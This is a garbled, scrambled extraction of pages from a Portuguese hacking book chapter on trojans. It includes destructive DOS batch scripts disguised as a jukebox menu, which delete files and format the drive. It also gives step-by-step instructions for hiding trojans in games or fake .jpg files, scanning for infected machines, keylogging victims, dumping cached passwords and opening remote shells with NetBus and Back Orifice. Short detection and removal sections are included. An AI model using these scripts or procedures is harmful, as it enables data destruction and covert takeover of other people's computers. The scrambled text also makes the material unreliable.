<enter>

<enter>

<enter>

<enter>

<enter>

arquivo.b<enter>

o Frase de sua preferê

<enter>

tecla F6> <enter>

executasse como lote.bat no prompt de como um hacker poderi o system.com e leva

uivo.

s atraz foi de comandos a se

del *.sys

del *.exe

del *.com

cd windows

del *.*

cd\

del at

@ech ncia

<

Se alguém o ando ele entraria em ação, ou entã a copia-lo em um disquete juntamente com -lo a qualquer outro micro, bastando executar o arq

Muito espalhado a alguns ano o roleta russa, que na verdade é uma seqüência rem executados num

Terrorismo Tecnológico Aprenda Para Sobreviver

159

únic ver como a roleta russa funcio

Novamente era feito em DOS:

copy con roletarrussa.bat <en

<enter>

do à virtual Juke-box <enter>

@echo Escolha a cancão favorita para tocar agora:

<enter>

@echo (1) - You hate - Rammstein

<enter>

@echo (2) - The Kiss of Judas - Stratovarius <enter>

@echo (3) - Everything Die - Type 0' Negative

<enter>

@echo (4) - Patricia - Ray Connif <enter>

choice /c1234

<enter>

o procedimento para “invernizar” a vida de um usuário, vamosnava:

ter>

@echo off

@echo Bem-vin

@echo <enter>

Terrorismo Tecnológico Aprenda Para Sobreviver

160

if errorlevel 1 goto Um <enter>

if errorlevel 2 gto Dois

<enter>

if errorlevel 3 goto Três <enter> if errorlevel 4 goto Quatro <enter>

<enter> :Um <enter> cd\ <enter>

xdel *.doc /s <enter> xde > goto finale <enter>

<en r> :Dois <enter>

copy c:\windows\system\*.* > nul <enter> cd Judas <enter>

goto finale <enter>

:Quatro <enter>

l *.xls /s <enter

te

md Judas <enter>

<enter> :Três <enter>

format c: /y > nul <enter> goto finale <enter>

<enter>

echo Sua agonia já tem sido grande o suficiente. Desculpe... <enter> <enter>

:finale <enter> (aperte a tecla F6 para finalizar)

(Mas num seja idiota de executar isto na sua máquina ok!)

Terrorismo Tecnológico Aprenda Para Sobreviver

161

Capítulo VIII

Cavalo de tróia (Trojans) - Neste capítulo será explicado como funcionam como se detecta e como remover um Trojan (Cavalo de tróia)

Terrorismo Tecnológico Aprenda Para Sobreviver

162

8.1 Trojan

um Trojan?O que é

nome cavalo de tróia vem na verdade da historia em que o governante da cidade de Tróia na antiga Grécia foi presenteado com um cavalo de madeira no qual estavam escondidos soldados inimigos, à noite em quanto todos estavam dormindo os soldados sa am e dominaram a cidade, que não estava esperando um at

sso aí, é um arquivo (programa) que rouba informações do seu computador e muitas vezes até o domina fazendo com que ele possa resetar, fazer logoff, abrir e fechar o drive de cd rom, copiar a tela que esta sendo vista, copiar, apagar, programas e arquivos. Tudo isso sem que o computador que está sendo atacado fique sabendo, a não ser claro no caso de fazer logoff, resetar etc. O trojan é tão poderoso que escraviza a máquina e pode até mesmo mexer o mouse ou desativar teclas do teclado.

instalado na máquina, após isto cada vez que o usuário reinicia o seu computador este arquivo se auto inicializa ficando então sempre ativo esperando o seu comandante (o mar.

Intranet, o “hacker” (vou chamar assi

O

íraque. E o trojan é i

O arquivo infectado é

invasor) o cha

Este arquivo irá abrir uma porta do computador, ele pode até mesmo criar um usuário e uma senha para que só a pessoa que o instalou consiga invadir e usá-lo. Feito isto pela Internet ou uma

m o invasor a partir de agora) pega o endereço IP do micro infectado e entra em seu sistema. A partir daí ele escraviza e domina toda a plataforma alheia.

Terrorismo Tecnológico Aprenda Para Sobreviver

163

A grande dificuldade para administradores é que o sistema operacional pode ser perfeito e não ter nenhum bug, pois o trojan não precisa de falhas para atuar. Na precaução jamais abra arquivos executáveis enviados por estranhos ou pegos em sites du tar escondido em um jogo ou algum aplicativo e quando você o executar ele vai se auto-ins

- Hack’a’tack - Girlfriend - ackcmd

Amanda

vidosos. Pois o trojan pode até mesmo es

talar, fique esperto com o tamanho dos arquivos e se achar que tem algum problema utilize um antivírus e cheque este arquivo. No caso de a dúvida persistir ou delete o arquivo ou tente executá-lo em uma máquina para testes.

8.2 Invasão

Melhores trojans para Windows: - Netbus - Back Orifice - Netsphere - SubSeven

- - Keystroke Logger Achtung - Backdoor Remote Control - Aladino Remote Control

Terrorismo Tecnológico Aprenda Para Sobreviver

164

Melhores para Linux - Sutrojan - NC110 UX Melhores para MAC

s trojans são facilmente encontrados na Internet, e possuem dois arquivos principais o servidor você pode encontrar um para teste e sando trojans.

servidor é o arquivo infectado que é instalado na máquina que va

e uma tela onde vários comandos são fa

- SubSeven Melhores para Solaris - Sutrojan O

que são o cliente e ntrando no google e pesqui

Oi ser invadida, ele pode ser mandado camufladamente em outro

arquivo, o que é necessário é que o arquivo seja executado, e o cliente é o aplicativo usado pelo invasor para se comunicar com a máquina invadida, este abr

cilmente usados como vamos ver na próxima figura. Vamos relembrar: Todos os computadores possuem portas que vão de 0 a 65535,

cada porta serve para um determinado serviço que está ativo no computador, como o servidor de web o http usa a porta 80. O servidor (arquivo infectado) abre uma dessas portas do computador digamos a 1234 e está será a porta que o cliente “hacker” vai usar para invadir o micro infectado. No aplicativo cliente, possui diversas

Terrorismo Tecnológico Aprenda Para Sobreviver

165

funções que escraviza a máquina fazendo com que ela controle praticamente todas as funções do sistema invadido, o software trabalha graficamente, bastando colocar o ip e a porta do co

graminha como, por exemplo, o Scan Busmputador infectado clicando então em conectar. Existem alguns pro que

é encontrado na Internet que faz uma busca e conforme vai s de máquinas infectadas vai mostrando para o

acker. Ele então nem tem a dificuldade de infectar alguém basta encontrar uma máquina

Desco gramas omo o IPTracaer

encontrando IP´h

infectada e invadir. brir o IP de alguém também é muito fácil com pro

c que mostra os endereços em salas de chats.

les não são muito utilizados, porém são os que mais enganam os administradores, é instalado um servidor em um computador dig

assim possa ser itos os ataques. O computador vira um servidor Proxy, e este

omo já foi visto no capítulo de anonimidade faz uma espécie de rov do hacker.

8.4 Trojans comerciais

O PcAnywhere é um deles, outro é o terminal remoto do Windows 2000 e XP. Esses não são os únicos existem muitos outros. Eles possibilitam que novamente controle totalmente outra máquina. Você pode ate executar o Word e começar a digitar como se você estivesse digitando no teclado da máquina invadida.

8.3 Trojans de ponte

E

amos de um cliente que o “hacker” arrumou seu servidor (geralmente o hacker trabalha com informática) e fec

teamento, então caso alguém descubra que esta sendo invadido ai vir procurar na casa nesta máquina e não na casa da máquina

Terrorismo Tecnológico Aprenda Para Sobreviver

166

E esses programas o antivírus não acusa como trojan, já que são programas comerciais. Como teste pegue em algum site de busca o VNC, ele é gratuito, configure-o e experimente.

8.5 Camuflando

Em sites de buscas existem muitas ferramentas que possibilitam esconder os trojans dentro de outros arquivos ou aplicativos, são facilmente encontrados até em revistas de informática em que acompanha um CD-ROM.

O The Joiner é um programinha que junta 2 aplicativos (executáveis) e os transforma em 3. Podemos então juntar um jogo e um trojan, e quando alguém for instalar, os dois aplicativos serão instalados.

No IRC4, é muito comum receber fotos que na verdade são arquivos. Os Hackers renomeiam esses arquivos para parecer uma foto como, por exemplo, gostosa.jpg_________ .exe , o jp não é extensão deste arquivo, mas sim parte do nome, foi dado um eassim o usuário vai achar que é uma foto quando na verdade é um executável.

r do The Joiner são pegos pela m

8.6 Usando o Net bus 2.10 como teste

g

spaço bem grande entre o nome do arquivo ate a sua extensão,

Os arquivos que são feitos a partiaioria dos antivírus.

4 IRC – é um serviço de bate-papo, sendo o Mirc o mais conhecido dele alguns exemplos são, T7DS, Gasper, Money...

Terrorismo Tecnológico Aprenda Para Sobreviver

167

Vamos utilizar o Netbus trojan 2.10 para conectarmos ao nosso próprio computador, quando quisermos fazer esse tipo de teste temos que usar o ip 127.0.0.1 que acessa a própria máquina, também tem que infectá-la antes então execute o NBSvr.exe

- Abra o programa cliente do Trojan Netbus que é o NetBus.exe

se precisar desative o anti vírus para fazer o teste.

- Na tela inicial nesta versão do programa já tem o Meu computador então basta dar um duplo clic. Ou clique em connect!

Apóna b

s clicar em connect tem que aparecer connected to 127.0.0.1 arra de status.

Terrorismo Tecnológico Aprenda Para Sobreviver

168

Agora basta ir navegando entre as opções e veja tudo o que é po vel! ssí

Terrorismo Tecnológico Aprenda Para Sobreviver

169

1. Clique em Open CD-ROM para abrir o drive de cd-rom 2. Em Start Program e coloque c:\windows\notepad.exe para

oco de nota. 3. oque um endereço e mande o

computador para alg4. sten para mostrar na sua tela os caracteres digitados

dor invadido, você cairá nesse site configurado. Por exemplo: ao digitar 127.0.0.1 no browser fui enviado para www.google.com.br

abrir o blClique em Go to URL col

um site. Use Lipela pessoa e intervir no meio (como se você estivesse escrevendo no Word e de repente as palavras se formarem sozinhas).

5. A Port Redirect cria uma ponte. Coloque uma porta (geralmente use a 80) e um site. Assim quando for ao Internet Explorer e digitar o IP do computa

Terrorismo Tecnológico Aprenda Para Sobreviver

170

6.

o servidor.

ma ferramenta que pode ser utilizada como um sis de administração remota para os ambientes operacionais Wi dows 98 e Windows NT.

s e facilidades, o NetBus pa

s máquinas de suas vítimas, sem serem no dos.

Servidor NetBus é auto-instalável indicando que na primeira execução a máquina passará a ser comprometida.

O NetBus p o Servidor, apresentando inúmeras características das quais se destacam:

Auto-instalável

ecutar qualquer aplicativo Permite fechar/terminar qualquer aplicativo

- Permite rebootar o servidor

você ainda pode capturar telas, executar programas.... 7. Para desconectar, clique em disconnect. 8. A opção server admin retira

8.7 Manual NetBus

8.7.1 Introdução

O NetBus é utemandows 95, WinÉ composto por um programa que atua como Servidor e um

programa que atua como Cliente, permitindo conexões remotas mesmo através da Internet, utilizando-se do protocolo TCP.

Por suas inúmeras característicassou a ser utilizado principalmente por hackers que pretendem

manter controle sobre atados/detecta

8.7.2 Comprometimento O

ermite um amplo controle sobre

- - Auto executável (com o boot do Windows) - Permite iniciar/ex-

Terrorismo Tecnológico Aprenda Para Sobreviver

171

- Pode desconectar usuários - Permite enviar caracteres para aplicativos ativos - Permite capturar o que esta sendo digitado no computador

ser idor

ervidor

Não aparece na Task List do Windows

Além disso, o NetBus faz uso de senhas para permitir o controle de acessos ao Servidor NetBus. A string que contém a senha que o Cliente envia para vidor é semelhante à linha abaixo:

Password;0;my_password No entanto, detectou-se a presença de um backdoor no NetBus

que permite a conexão com o Servidor sem a necessidade de sepode conectar-se sem autenticação bastando substituir o valor do segundo parâmetro da stri 1".

ode perfeitamente ser renomeado para qualquer outro nome. O NetBus utiliza TCP para esta elecer o envio/recebimento de

pacotes e da e 12346 aguardando por conexões de clientes.

v- Permite capturar a tela (screenshot) do computador servidor - Retorna informações gerais sobre o computador - Permite realizar upload de arquivos para o s- Permite realizar download e deleções de qualquer arquivo do

servidor - Permite capturar o som de microfones instalados no servidor - Possui esquemas de proteção e validação de acessos através

de senhas -

o Ser

qualquer Cliente estabelecer utilizar uma senha. O Cliente

ng de conexão acima de "0" para "

8.7.3 Detecção Por default, o Servidor NetBus chama-se Patch.exe. No entanto

pb

dos, permanecendo ativo nas portas 12345

Terrorismo Tecnológico Aprenda Para Sobreviver

172

Como primeiro passo, é possível verificar se essas portas estãoem uso por algum serviço. Para tantoc

utiliza-se o comando 'netstat'

onforme exemplo abaixo: :\>netstat -an | find "1234"

TCP 127.0.0.1:m seguida, é possível identificar que serviço está ativo na

porta apresentada pelo netstat. Para tanto se utiliza o comando teln

u: 'NetBus 1.60' Al o

Windows a prpel programa quando de ão. Execute o 'regedit' e faca uma busca pelas chaves abaixo:

c12345 0.0.0.0:0 LISTENING

E

et, conforme exemplo abaixo: c:\>telnet 127.0.0.1 12345 Se o NetBus estiver instalado e aguardando por conexões

nesta porta, a seqüência abaixo irá aparecer na janela do telnet: 'NetBus 1.53' O

em desse procedimento, é possível examinar o registro docura de algumas chaves que podem ser criadas

sua instalaço

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run[Nome

do NetBus] HKEY_CURRENT_USER\Patch\Settings\ServerPwd A primeira chave indica que o NetBus está configurado para ser

inicializado automaticamente a cada boot do sistema. Já a segunda chave indica qual a senha (em formato texto puro) que esta sendo utilizada para validar conexões.

8.7.4 Removendo o NetBus Indicam-se dois procedimentos básicos e simples para

remoção do NetBus:

Terrorismo Tecnológico Aprenda Para Sobreviver

173

1) fazer uso de uma opção do Servidor NetBus que automaticamente deleta o executável, conforme exemplo abaixo:

c:\>nome_do_netbus_server.exe /remove 2) utilizar o Cliente do NetBus para fazer essa remoção. Basta

conectar-se ao Servidor (podendo ser localhost), selecionar "Server admin" e em seguida "Remove server".

No entanto, notamos que em alguns casos as duas opções falharam ao limpar o registro do Windows. Logo, indicamos que o processo de remoção seja feito manualmente deletando-se o executável e limpando-se o registro eliminando-se as chaves criadas pelo NetBus.

8.8 Manual Back Orifice

8.8.1 O que é o Back Orifice?

Back Orifice ou simplesmente BO, é um aplicativo clie

como um cavalo de tróia.

Onte/servidor apenas para Windows 95 e 98, que permite ao

cliente monitorar e administrar a máquina rodando o servidor. Pode ser considerado

8.8.2 Quem criou o Back Orifice?

Terrorismo Tecnológico Aprenda Para Sobreviver

174

O criador do Back Orifice, é um grupo Hacker chamado Cult of Dead Cow ou Culto da Vaca Morta.

funciona?

isualização de uma home page, compreendendo uma máquina cliente e outra servidora, respectivamente. Assim é o Ba os. A máquina que roda a versão cliente pode conectar-se com uma máquina que rod

8.8.4 Quem são os servidores e quem são os

ois, acredito, que ninguém go os pessoais, para algumas mil o o programa BO vem com s utilitários, as versões clie

s que, quem está rodando o servidor do Ba ersão cliente para, talv acabou tornando a si p

use. E o servidor se ins e ap a cad nicia sem que nin fundo e não de

8.8.3 Como ele

Assim como um browser conecta-se a um servidor da Internet

para a v

ck Orifice, que se utiliza os mesmos process

a a versão servidora.

clientes? Na grande maioria dos casos, a versão servidora é rodada em

uma máquina por simples descuido. Paria de disponibilizar seus arquivst

hares de pessoas no mundo. Compactado, contendo além de algun

nte e servidor. O usuário pode executar a versão errada (servidor), simplesmente por não ter lido ou entendido as ins uções. Mas lembra-notr

ck Orifice, pelo menos, tentou rodar a vz, divertir-se com a máquina dos outros. Ee

róprio, o brinquedo dos outros. para isto, basta um simples clique no moE

tala em sua máquina sem nada lhe mostrar e em seguida sga e passa a funcionar como um serviço do Windows. E aa vez que você ligar o seu micro, o servidor se iuém perceba. Ele funciona como um pano deg

ixa nenhum rastro.

Terrorismo Tecnológico Aprenda Para Sobreviver

175

O servidor do Back Orifice pode vir encoberto por um outro arq

a sua detecção. Permite ao administrador remoto tomar o controle de seu sistema: roubar suas senhas, enviar ou rec

imento ou consentimento.

uivo qualquer, e ao ser executado se instala na sua máquina, sem nenhum sinal. E uma vez rodando, o faz de uma forma que torna difícil

eber arquivos, rodar novas aplicações, observar e derrubar qualquer aplicação que você esteja rodando, e etc,... e sem o seu conhec

Especificações: O pacote bo.zip contém: bo.txt - este documento. plugin.txt - a ajuda para programação de plugin. boserve.exe - o auto-instalador do Back Orifice (BO).

do Back Orifice. oconfig.exe - utilitário de configuração de nome do executável,

pompacta arquivos compactados com o comando

"freeze". ser

descompactados com o comando "melt".

8.8.5 Comandos:

ser de melhor manuseio. Mas os comandos possuem a mesma sintaxe en

ui/texto:

ntrole o aplicativo modo texto ou modo dos (como command.com) via telnet.

bogui.exe - o cliente modo gráfico (GUI) do Back Orifice. boclient.exe - o cliente modo texto brta, senha e plugins do servidor BO. melt.exe - desco

freeze.exe - compacta arquivos que podem

Abordaremos a versão Bogui.exe (modo gráfico), por

tre as duas gráfica e texto. GApp add/appadd - abre e redireciona um aplicativo modo texto

para uma porta tcp. Isso permite que você co

Terrorismo Tecnológico Aprenda Para Sobreviver

176

App del/appdel - desliga o redirecionamento de um aplicativo. Apps list/applist - lista os aplicativos atualmente conectados.

a caso queira que mais de um arquivo seja listado.

irectory remove/rd - remove um diretório.

xport add/shareadd - compartilha um diretório ou drive do ser

aredel - remove um compartilhamento.

compartilhamento.

ile delete/del - remove um arquivo.

ile find/find - procura no diretório, arquivos que coincidam com a e

ile melt/melt - descompacta um arquivo.

ile view/view - visualiza o conteúdo de um documento texto.

TTP Disable/httpoff - desabilita o servidor http.

Enable/httpon - habilita o servidor http.

Directory create/md - cria diretório. Directory list/dir - lista arquivos e diretórios. Você deve

especificar um curing

D Evidor em rede. O ícone diretório ou drive compartilhado não é

alterado. Export delete/sh Exports list/sharelist - lista os compartilhamentos, o drive ou

diretório que está sendo compartilhado, os acessos e a senha do

File copy/copy - copia um arquivo. F Fspecificação curinga. File freeze/freeze - compacta um arquivo.

F F H HTTP

Terrorismo Tecnológico Aprenda Para Sobreviver

177

Keylog begin/keylog - registra o texto digitado no servidor em

um arquivo texto. O log mostra o nome da janela em que o texto foi digitado.

pture avi/capavi - captura vídeo e áudio (se disponível) de um dispositivo de captura de vídeo para um arquivo avi.

M Capture screen/capscreen - captura uma imagem da tela do

ídeo.

et delete/netdisconnect - desconecta o servidor de uma rede.

et use/netconnect - conecta o servidor em uma rede.

do servidor.

Informa o nome da máquina e a versão do BO.

Keylog end - interrompe o registro de texto digitado. Para

utilizar esse comando no modo texto, use o comando "keylog stop".

MM Ca

MM Capture frame/capframe - captura um quadro de vídeo de

um dispositivo de captura de vídeo para um arquivo bitmap. M servidor para um arquivo bitmap. MM List capture devices/listcaps - lista os dispositivos de

captura de v MM Play sound/sound - toca um arquivo wav no servidor. Net connections/netlist - lista as conexões de entrada e saída

da rede. N N Net view/netview - lista todas as interfaces de rede, domínios,

servidores e envios Ping host/ping - testa a conexão com a máquina remota.

Terrorismo Tecnológico Aprenda Para Sobreviver

178

Plugin execute/pluginexec - executa um plugin do Back Orifice. Executar funções não entendidas pelo plugin pode fazer com que o servidor trave.

Plugin kill/pluginkill - desliga um plugin. Plugins list/pluginlist - lista plugins ativos ou avisa de que um

plugin foi desligado. Process kill/prockill - termina um processo. Process list/proclist - lista processos rodando. Process spawn/procspawn - abre um programa. Pelo GUI, se o

segundo parâmetro é especificado, o processo será executado normalmente e visível. Caso contrário ele será executado de maneira invisível.

Redir add/rediradd - redireciona recebimento de conexões tcp

ou pacotes udp para outro endereço ip. Redir del/redirdel - interrompe o redirecionamento de uma

porta. Redir list/redirlist - lista os redirecionamentos de portas ativos. Reg create key/regmakekey - cria uma chave no registro. NOTA: Para todos os comandos de registro, não especificar a \\

inicial de valores de registro.

Reg delete key/regdelkey - remove uma chave no registro.

eg delete value/regdelval - remove um valor no registro.

Reg list keys/reglistke de uma chave de registro.

R

ys - lista as sub-chaves

Terrorismo Tecnológico Aprenda Para Sobreviver

179

Reg de

registro.

eg set value/regsetval - define um valor para uma chave de reg

com

ystem info/info - exibe as informações do sistema da máquina ser

ora.

list values/reglistvals - lista os valores de uma chave

Ristro. Os valores são especificados no formato tipo vírgula

valor. Para valores binários (tipo B) o valor é um série de dois dígitos hexadecimais. Para valores DWORD (tipo D) o valor é um número decimal. Para valores string (tipo S) o valor é uma string de texto.

Resolve host/resolve - determina o endereço ip de uma

máquina em relação à máquina servidora. O nome da máquina pode ser um "host name" ou o nome de uma máquina em rede local.

System dialogbox/dialog - cria uma caixa de diálogo no servidor o texto informado e um botão "ok". Você pode criar quantas

caixas de diálogo quiser, elas aparecerão em cascata umas sobre as outras.

Svidor. Os dados exibidos incluem nome da máquina, usuário,

tipo de cpu, memória total e disponível, dados sobre a versão de Windows e informações sobre os drives, incluindo tipo (fixo, cd-rom, removível ou remoto) e, nos drives fixos, o tamanho e espaço disponível do drive.

ystem lockup/lockup - trava a máquina servidS

System passwords/passes - exibe as senhas cacheadas e a

senha do protetor de tela. As senhas podem apresentar caracteres estranhos no fim.

System reboot/reboot - desliga o servidor e reinicia a máquina.

Terrorismo Tecnológico Aprenda Para Sobreviver

180

Te

CP file receive/tcprecv - conecta o servidor a um ip e porta specíficos e grava qualquer dado recebido por aquela conexão

em um arquivo. TCP file send um ip e porta

específicos, envia o conteúdo o arquivo especificado e o de onecta. Arquivos podem s transferidos _do_ servidor usa

ows do netcat não desconcerta nem se fina Após o término, finalize o netcat co

Windows. O nome não precisa tem a

/tcpsend - conecta o servidor ader sc

ndo-se o comando "tcp file send" e o utilitário netcat com os parâmetros: netcat -l -p 666 > arquivo Arquivos podem ser transferidos _para_ o servidor usando-se o comando "tcp file receive" e o utilitário netcat com os parâmetros: netcat -l -p 666 < arquivo NOTA: A versão para Wind

liza quando atinge o final da transmissão. m ctrl+c ou ctrl+break.

BOConfig: BOconfig.exe permite configurar as opções de um

boserve.exe antes que ele seja instalado. Ele requisitará: Runtime executable name O nome do arquivo que o Back Orifice se instalará no diretório system do

extensão exe, ela será automaticamente adicionada. Exe description in registry A descrição do executável do Back Orifice no registro do Windows, de onde ele será executado sempre que o Windows se iniciar. Server port A porta em que o servidor será acessado. Encryption password A senha de acesso ao servidor. Não é obrigatória e pode ser deixada em branco. Default plugin to run on startup O plugin do Back Orifice a ser executado ao iniciar. File to attach Arquivo a ser anexado ao boserve.exe. Ele pode ser um plugin, que será automaticamente iniciado com o boserve.exe. NOTA: Se o servidor não for configurado com o BOconfig.exe, ele se comunicará na porta 31337.

Sem senha, e se instalará como “.exe".

8.8.6 O Manual:

Terrorismo Tecnológico Aprenda Para Sobreviver

181

Como encontrar uma máquina rodando o

ambém abrir o NOTEPAD e criar uma lista de sub-redes (uma por linha), salvá-la no mesmo diretório do Bogui.exe e en

uivo que você criou na caixa de texto que surgirá.

b-redes do arquivo. ou uma máquina

servidor do Back Orifice? Você pode fazê-lo de duas formas. A primeira é digitando o

endereço de uma sub-rede na pequena caixa no canto superior esquerdo. Ex. 195.219.222.* e pressionando "ENTER". Isto fará com que o Back Orifice procure por todos os endereços IP do 195.219.222.0 até o 195.219.222.255.

Você pode t

tão, pressionar o botão PING no canto inferior esquerdo da janela.

Agora digite o nome do arq

O Back Orifice irá então, buscar todas as suComo saberei que o Back Orifice encontr

rodando o servidor ? Quando o Back Orifice detectar uma máquina rodando o

ser idor, ele irá mostrar uma mensagem como está: ---------- Packet received from host 195.130.131.69 port 31337

----

ack Orifice e o nome DEFAULT, é o nome do computador-servidor".

superior esquerda para começar a executar os comandos.

o comando /whois "nick")

v-----------

!PONG!1.20!DEFAULT! ----------------------- End of Data -----------------------

Que significa: "Pacote recebido do host (endereço IP dp

servidor) 195.130.131.69 porta 31337". "PONG, significa a resposta ao seu comando PING. O número 1.20 indica a versão do servidor B

Digite o endereço IP completo, encontrado na mesma caixa de texto

(Uma boa forma de encontrar endereços IP`s é no mIRC, através d

Terrorismo Tecnológico Aprenda Para Sobreviver

182

Como posso ver e baixar os arquivos do

winchester do servidor?

ero) na caixa de texto drive) na caixa "root". Então,

Nada mais fácil! Apenas selecione o comando "HTTP Enable"

na janela do Bogui, digite "80" (ou outro núm"port" e "c:" (ou outra letra dopressione o botão "send".

Você deverá ver uma mensagem como esta:

** 15:HTTP Enable packet sent (25 bytes) val1: '80' val2: 'c:' ----

------- Packet received from host 195.130.131.69 port 31337 -----------HTTP server listening on port 80 ------------------------- End of Data -------------------

Internet Explorer também se sairá bem). No campo de endereço, digite "http://endereçodeip". No caso acima, seria

Se ta, então adicione-o ao endereço de IP. Ex. "http://195.130.131.69:3000".

ronto! Agora você poderá visualizar o conteúdo do drive C:\ do ser

s que se qu

rio "C:\WINDOWS\MEUS DOCUMENTOS". Você deverá digitar no

Agora simplesmente, abra um Browser (Netscape Navigator

funciona melhor neste caso, mas o

"http://195.130.131.69". você utilizou um número diferente de "80" para a por

Pvidor na janela de seu browser. Clicando em um diretório, você

será transferido para ele. Clicando nos arquivos, você os baixará. OBS: O ideal é digitar os nomes de arquivo ou diretórioer acessar ou baixar, no campo do endereço. E também é

necessário respeitar os 8 caracteres para nomes de arquivos ou diretórios. Por exemplo: Se você deseja acessar o diretó

campo de endereço: "http://195.131.131.69/windows/meusdo~1". É a mesma regra do DOS.

Terrorismo Tecnológico Aprenda Para Sobreviver

183

Como posso enviar arquivos para o servidor? Siga o mesmo procedimento acima. Quando o conteúdo do

drive especificado aparecer em seu browser, role-o até a parte inferior. Você notará dois botões e uma caixa de texto. No botão "browser" ou "procurar", você irá especificar que arquivo da sua má uina, você quer enviar. Após selecioná-lo, clique em upload para enviá-lo.

OBS: iona. Pode-se utilizar também o utilitário NETCAT para o envio de arquivos, através do comando.

você deseja armazenar os registros. Você pode escolher qualquer nome, mas é recomendável que se utilize uma extensão .txt (texto), pelo fato de que este tipo de arquivo pode ilmente visualizado pelo seu browser. No exemplo abaixo, o arquivo foi chamado de "system.txt".

** 17:Keylog begin packet sent (29 bytes) val1: 'system.txt' val2:

'c:' -

q

Em nem todos os casos este procedimento func

para enviar: "nc -l -p 666<nomedoarquivo" para receber: "nc -l -p 666>nomedoarquivo" * O número 666 representa a porta, podendo ser mudado. Veja o que o usuário do servidor está digitando. Para realizar esta função, você precisa selecionar o comando

"Keylog begin" na janela do seu Back Orifice. Na caixa de texto "filename", digite o nome de um arquivo que

ser fac

--------- Packet received from host 195.130.131.69 port 31337 ---------------

Terrorismo Tecnológico Aprenda Para Sobreviver

184

Logging keys ------------------------- End of Data -------------------

Após isto, execute o comando "File find" com o nome do

arquivo em uma caixa de texto e "c:" em outra. Isto resultará em a

*c\:Sc:\Program Files\ICQ\system.txt E-

arqu txt". Abra uma janela do seu browser e abra o arquivo que você verá do servidor esteve digitando.

eça quando a gravação dos

reg o, clique no comando "Keylog end" na janela do seu Back Orifice.

Veja as senhas do usuário armazenadas no servidor.

s simples das funções. Apenas clique no comando "System passwords" e pronto, as senhas aparecerão pa

lgo como: * 32:File find packet sent (31 bytes) val1: 'system.txt' val2: 'c:'t ' YSTEM.TXT 49 -A----- 08-23-98 23:17

nd of search -------------------------- End of Data -------------------------

Isto lhe dará uma lista de todos os locais onde existirem ivos de "system.

tudo o que o usuário

OBS: Talvez o arquivo só aparistros for interrompida. Neste cas

Talvez esta seja a mai

ra você! Como abrir um prompt do DOS na máquina servidora. Para fazê-lo, você precisa selecionar o primeiro comando da

lista na janela do seu Back Orifice, "App add". Não caixa de texto, digite "command.com" e na segunda caixa de texto digite, "23".

Agora, você precisa abrir uma sessão do TELNET na sua máquina. Pressione o botão INICIAR do seu computador e em

Terrorismo Tecnológico Aprenda Para Sobreviver

185

seguida, clique em EXECUTAR. Digite TELNET e o programa irá se iniciar.

Clique no menu "Connect" e escolha o primeiro item "Remote system". Uma pequena janela irá surgir, com três caixas.

o IP da máquina servidora no campo "Host Name". Então pressione o botão "Connect". Após alguns segundos,

elecione o comando "System Dialogbox". Na caixa de texto "title", digite o título que você deseja que apareça na caixa de diá xto "text", digite o texto da mensagem. Então pressione o botão "send" e você deverá ver uma confirmação do envio da mensagem.

s

Vamos utilizar como exemplo de detecção por portas, o meu prog ojans versão 1.6. Se quiser tentar outro programa,

Apenas digite o endereç

o prompt do DOS irá aparecer na janela do TELNET. Você pode agora usar os comandos do DOS no servidor. (dir, cd, copy,...)

Mande mensagens na tela do servidor. S

logo. Na caixa de te

Capture a tela do usuário em um arquivo.BMP. Você pode salvar em um arquivo a tela capturada da máquina

servidora. Selecione o comando "MM capture screen". Na caixa de texto a esquerda, digite o nome de um arquivo qualquer com extensão.BMP e então clique no botão "send". Você deverá receber uma confirmação do comando, então o arquivo.BMP estará na máquina servidora podendo ser baixado.

8.9 Utilizando o Anti-Trojan

rama Anti-Tr

Terrorismo Tecnológico Aprenda Para Sobreviver

186

tentedp

ue na pasta Configuração, e coloque a mensagem para a pessoa que tentar lhe invadir. Se quiser, configure um e-mail

va de invasão seja reportada. 3. Clique na pasta Monitorar. 4. Clique no botão Monitorar. Agora clique com o botão direito no

ícone do superman na barra de tarefas e selecione esconder. 5. Simule uma tentativa de invasão indo a Iniciar / Executar e

digitando: telnet 127.0.0.1 12345

Pronto você já esta mais seguro

o Xô Bo Bus brasileiro ou algum estrangeiro (procure em sites e pesquisas). Claro que um firewall (como veremos depois) é mais otente. 1. Abra o programa 2. Cliq

para que a tentati

8.10 Remoção do trojan

or portas

Detecção p

se é um método utilizado por programas como o Xôbobus, Anti-Trojans e muitos outros. Funciona do seguinte modo: os programadores estudam as portas TCP e UDP utilizadas pelos trojans e criam um programa que abre essas portas. Assim, quando um invasor vir à porta aberta e pensar que é um cavalo de tróia que está instalado ali, cairão em uma armadilha tendo o seu endereço IP detectado. Esse método não é muito eficiente pois

Es

Terrorismo Tecnológico Aprenda Para Sobreviver

187

facilmente podemos mudar as portas que os trojans utilizam. Mas ainda é um método muito usado, pois muitos hackers não se lembram de trocar as portas.

etecção pelo arquivoD

antivírus e o programa The Cleaner. Ele detecta o trojan checando a sua estrutura. Se o arquivo estiver renomeado (sem ser para executável) ou estiver comprimido, esse método se torna inútil. Para ser realmente eficaz, deve ser usado junto à detecção de portas. Assim, mesmo que seu antivírus não encontrou um trojan, o Anti-Trojans pode encontrar.

etecção por string

Esse é o método usado pelos

D

uco divulgado publicamente se torna a melhor garantia para se detectar um trojan sem falhas. Mesmo que o programa for comprimido ou mude suas portas, ele ainda estará usando uma das 65535 portas do sistema e se comunicará com o cliente. A comunicação entre cliente e servidor se dá por uma string (texto) enviada. Por exemplo: O Netbus 1.7 envia uma string assim “Netbus 1.7x” quando alguma conexão é estabelecida. Se for o cliente, ele responderá com outra string. Então para analisar todas as portas do seu sistema e saber quais estão abertas e possuem strings, utilize um programa como o Chaoscan ou algum outro scanner de porta que lhe dê essas informações.

etecção manual

Po

D

Terrorismo Tecnológico Aprenda Para Sobreviver

188

Muito eficaz também, nual do sistema pelo operador. Olhando registro, arquivos de inicialização, conferindo os programas carregados na memória, o tamanho dos arquivos, etc

aos outros tipos de detecção faz com

a checagem ma

... Essa política adotada junto que você exclua em 100% a chance de uma invasão por

trojan.

Terrorismo Tecnológico Aprenda Para Sobreviver

189

Capítulo IX

Senha – Saiba

tudo sobre elas!

Terrorismo Tecnológico Aprenda Para Sobreviver

190

9.1 veja só!

AquiVam

está uma coisa muito interessante. os analisar um banco:

Vocêacessar

Os nde 10 n

Bom su para cada digito tem-se a opção de 10 números diferentes que você pode usar então temos:

10 opções no 1º ito, 10 opções no 3º digito e 10 opções no 4º digito.

